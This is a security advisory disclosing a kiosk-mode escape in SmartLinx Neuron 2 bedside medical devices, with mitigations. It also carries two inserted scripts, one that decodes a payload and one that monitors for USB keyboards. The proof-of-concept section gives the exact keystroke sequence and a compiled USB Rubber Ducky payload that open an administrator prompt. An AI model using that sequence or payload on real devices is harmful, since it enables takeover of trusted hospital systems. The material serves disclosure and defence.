Talos Vulnerability Report

TALOS-2019-0785

Capsule Technologies SmartLinx Neuron 2 restricted environment protection mechanism failure vulnerability

April 8, 2019
CVE Number

CVE-2019-5024

Summary

A restricted environment escape vulnerability exists in the "kiosk mode" function of Capsule Technologies SmartLinx Neuron 2 medical information collection devices running version 6.9.1. A specific series of keyboard inputs can escape the restricted environment, resulting in full administrator access to the underlying operating system. An attacker with physical access can connect a keyboard or other HID device to the device's USB port to trigger this vulnerability.

Tested Versions

Capsule Technologies SmartLinx Neuron 2 6.9.1

Testing was conducted on a legacy version of the software which is no longer supported by Capsule Technologies. However, Talos is aware that the vulnerable version is being used in hospital environments and is therefore releasing this advisory.

Product URLs

https://www.capsuletech.com/capsule

CVSSv3 Score

7.6 - CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-693: Protection Mechanism Failure

Details

The Capsule Technologies SmartLinx Neuron 2 is a "bedside mobile clinical computer that enables the automatic collection of vital signs data. It features local data storage, and connects to the hospital network" and "is the core hardware component of Capsule™ medical device information system," according to the manufacturer.

The devices feature a restricted environment, commonly referred to as "kiosk mode," to prevent a user from exiting the running applications and accessing the underlying operating system. It is possible to connect a USB keyboard or other HID device and, through a series of specific keystrokes, escape this restricted environment and access the Microsoft Windows operating system with full administrator permissions. This access could provide an attacker with full control of a trusted device on a hospital's internal network.

Exploit Proof of Concept

Connect a USB keyboard to the device. Entering the following keystrokes will escape the restricted environment and open an operating system command prompt with administrator privileges.

1. ALT
2. DOWN (6 times)
3. ENTER*
4. SHIFT (5 times)
5. SHIFT-TAB
6. SPACE
7. SHIFT-TAB
8. SPACE
9. cmd.exe
10. ENTER

* Steps 1-3 may need to be performed twice.

Alternatively, programming a USB Rubber Ducky with the following "duck code" (shown here as a hex dump of the compiled payload) will automatically yield the same result as the keystrokes above.

00000000: 00ff 00ff 00ff 00ff 00ff 00ff 00ff 00ff ................
00000010: 00ff 00ff 00ff 00c3 0204 00ff 00ff 00ff ................
00000020: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000030: 00ff 00ff 00eb 2800 0204 00ff 00ff 00ff ......(.........
00000040: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000050: 00ff 00ff 00eb 2800 0204 00ff 00ff 00ff ......(.........
00000060: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000070: 00ff 00ff 00eb 2800 0202 0202 0202 0202 ......(.........
00000080: 0202 00ff 00ff 00ff 00eb 2b02 2c00 00ff ..........+.,...
00000090: 00ff 00ff 00eb 2b02 2c00 00ff 00ff 00ff ......+.,.......
000000a0: 00eb 0600 1000 0700 2800 ........(.
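To read a captured payload like the one above without replaying it on a device, the dump can be decoded back into Ducky Script-style lines. The decoder below is an added example and is not code from the Talos advisory; it embeds the advisory's own hex dump as its input. It assumes the Duck Encoder output format (2-byte records: a 0x00 first byte is a delay with the second byte in milliseconds, chained to build longer delays; otherwise the first byte is the USB HID usage ID and the second the modifier bitmask) and, as inferred from this dump, that a modifier pressed on its own (ALT, SHIFT) is stored with 0x02 in the usage byte. Decoding shows the ALT, DOWN x6, ENTER sequence repeated three times, which is consistent with the footnote on the manual steps, and that the payload types "cmd" rather than "cmd.exe".

```python
"""Decode a USB Rubber Ducky inject.bin (given as an xxd-style hex dump) back into
Ducky Script-style lines, so a captured payload can be read without replaying it."""
import re
from typing import List

# Hex dump copied from the advisory (xxd layout: offset, 16-bit groups, ASCII column).
ADVISORY_DUMP = """\
00000000: 00ff 00ff 00ff 00ff 00ff 00ff 00ff 00ff ................
00000010: 00ff 00ff 00ff 00c3 0204 00ff 00ff 00ff ................
00000020: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000030: 00ff 00ff 00eb 2800 0204 00ff 00ff 00ff ......(.........
00000040: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000050: 00ff 00ff 00eb 2800 0204 00ff 00ff 00ff ......(.........
00000060: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000070: 00ff 00ff 00eb 2800 0202 0202 0202 0202 ......(.........
00000080: 0202 00ff 00ff 00ff 00eb 2b02 2c00 00ff ..........+.,...
00000090: 00ff 00ff 00eb 2b02 2c00 00ff 00ff 00ff ......+.,.......
000000a0: 00eb 0600 1000 0700 2800 ........(.
"""

# USB HID keyboard usage IDs (usage page 0x07) needed for this payload; a-z are 0x04-0x1D.
USAGE_NAMES = {0x28: "ENTER", 0x29: "ESCAPE", 0x2B: "TAB", 0x2C: "SPACE",
               0x4F: "RIGHT", 0x50: "LEFT", 0x51: "DOWN", 0x52: "UP"}
USAGE_NAMES.update({0x04 + i: chr(ord("a") + i) for i in range(26)})
MODIFIER_BITS = ((0x01, "CTRL"), (0x02, "SHIFT"), (0x04, "ALT"), (0x08, "GUI"))
# Assumption inferred from this dump: a modifier pressed on its own (ALT, SHIFT) is
# encoded with 0x02 in the usage byte and the modifier mask in the second byte.
MODIFIER_ONLY_USAGE = 0x02
HEX_GROUP = re.compile(r"[0-9a-fA-F]{4}")


def hexdump_to_bytes(dump: str) -> bytes:
    """Recover raw bytes from an xxd-style dump, ignoring offsets and the ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        if ":" not in line:
            continue
        for group in line.split(":", 1)[1].split():
            if not HEX_GROUP.fullmatch(group):
                break  # the first non-hex token starts the ASCII column
            out += bytes.fromhex(group)
    return bytes(out)


def decode_inject_bin(blob: bytes) -> List[str]:
    """Turn 2-byte records into Ducky Script-style lines.

    Assumed record layout (Duck Encoder output): a first byte of 0x00 is a delay whose
    second byte is milliseconds (long delays are chained as 0x00 0xFF ...); otherwise
    the first byte is the HID usage ID and the second byte the modifier bitmask.
    """
    if len(blob) % 2:
        raise ValueError("inject.bin must be an even number of bytes (2-byte records)")
    lines: List[str] = []
    delay_ms = 0   # accumulated chained delay records
    text = ""      # accumulated printable keys, emitted as one STRING line

    def flush_delay() -> None:
        nonlocal delay_ms
        if delay_ms:
            lines.append(f"DELAY {delay_ms}")
            delay_ms = 0

    def flush_text() -> None:
        nonlocal text
        if text:
            lines.append(f"STRING {text}")
            text = ""

    for i in range(0, len(blob), 2):
        usage, mod = blob[i], blob[i + 1]
        if usage == 0x00:
            flush_text()
            delay_ms += mod
            continue
        flush_delay()
        mods = [name for bit, name in MODIFIER_BITS if mod & bit]
        if usage == MODIFIER_ONLY_USAGE:
            flush_text()
            lines.append(" ".join(mods) if mods else f"UNKNOWN 0x{usage:02x}")
            continue
        name = USAGE_NAMES.get(usage, f"0x{usage:02x}")
        if len(name) == 1 and mods in ([], ["SHIFT"]):
            text += name.upper() if mods else name  # SHIFT+letter types uppercase
            continue
        flush_text()
        lines.append(" ".join(mods + [name]))
    flush_text()
    flush_delay()
    return lines


def keystrokes_only(lines: List[str]) -> List[str]:
    """Drop DELAY lines so the result can be compared with the manual keystroke list."""
    return [line for line in lines if not line.startswith("DELAY ")]


if __name__ == "__main__":
    print("\n".join(decode_inject_bin(hexdump_to_bytes(ADVISORY_DUMP))))
```

Running the script prints the decoded payload; `keystrokes_only` gives the bare key sequence for a side-by-side check against the manual steps. The decoder does not reproduce the Duck Encoder's full key map, so usage IDs outside the table are shown as raw hex rather than guessed.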

Mitigation

Apply vendor software updates. The current version (10.1) is reportedly unaffected by the vulnerability as described in this advisory.

Restrict physical access to vulnerable devices and ensure they remain outside of the organization's security perimeter. Ensure data or communications from said devices are not implicitly trusted by internal systems. If possible, physically disable or obstruct access to USB ports on vulnerable devices. Monitor device logs for connections of unauthorized peripherals to vulnerable devices.
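One way to act on the log-monitoring recommendation above is to compare newly configured HID-class devices against an allowlist of the peripherals a given device is expected to have. The script below is an added example, not from the advisory or the vendor. The event lines are constructed (not real logs) in the shape of Windows Kernel-PnP "Device ... was configured." messages (Event ID 400 in the Microsoft-Windows-Kernel-PnP/Configuration log) exported as timestamp, event ID and message; the vendor/product IDs and the allowlist are hypothetical.

```python
"""Flag HID device arrivals that are not on an allowlist, from exported Plug and Play events."""
import re
from typing import List, Set, Tuple

# Constructed sample lines (not real logs): "timestamp,event_id,message", with the message in
# the shape of Kernel-PnP Event ID 400 ("Device <instance path> was configured."). IDs are made up.
SAMPLE_EVENTS = """\
2019-03-04 07:58:12,400,Device HID\\VID_1111&PID_2222&MI_00\\7&1a2b3c4d&0&0000 was configured.
2019-03-04 07:58:12,410,Device HID\\VID_1111&PID_2222&MI_00\\7&1a2b3c4d&0&0000 was started.
2019-03-04 08:01:55,400,Device USB\\VID_3333&PID_4444\\6&2e3f4a5b&0&1 was configured.
2019-03-04 08:01:56,400,Device HID\\VID_3333&PID_4444\\7&3e4f5a6b&0&0000 was configured.
"""

# Hypothetical allowlist: the peripherals the site expects on this device (e.g. its own scanner).
APPROVED_HID: Set[Tuple[str, str]] = {("1111", "2222")}
VID_PID = re.compile(r"VID_([0-9A-Fa-f]{4})&PID_([0-9A-Fa-f]{4})")


def unapproved_hid_arrivals(events: str, approved: Set[Tuple[str, str]]) -> List[str]:
    """Return one alert line per newly configured HID device whose VID/PID is not approved."""
    alerts: List[str] = []
    for line in events.splitlines():
        try:
            stamp, event_id, message = line.split(",", 2)
        except ValueError:
            continue  # malformed export line; skip rather than crash the monitor
        # Only "configured" events for HID-class devices (keyboards, mice, keystroke injectors);
        # the USB parent node of the same device is reported separately and is ignored here.
        if event_id != "400" or not message.startswith("Device HID\\"):
            continue
        match = VID_PID.search(message)
        if not match:
            continue
        vid, pid = match.group(1).upper(), match.group(2).upper()
        if (vid, pid) not in approved:
            alerts.append(f"{stamp} unapproved HID device VID_{vid} PID_{pid}: {message}")
    return alerts


if __name__ == "__main__":
    for alert in unapproved_hid_arrivals(SAMPLE_EVENTS, APPROVED_HID):
        print(alert)
```

A keystroke injector that spoofs the VID/PID of an approved keyboard would pass this check, so the allowlist is a detection aid for opportunistic attachment, not a substitute for physically blocking the ports as recommended above.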

Timeline

2019-02-26 - Vendor Disclosure
2019-02-28 - Vendor tested and confirmed the issue does not reproduce on version 10.1
2019-04-08 - Public Release

Credit

Discovered by Patrick DeSantis of Cisco Talos.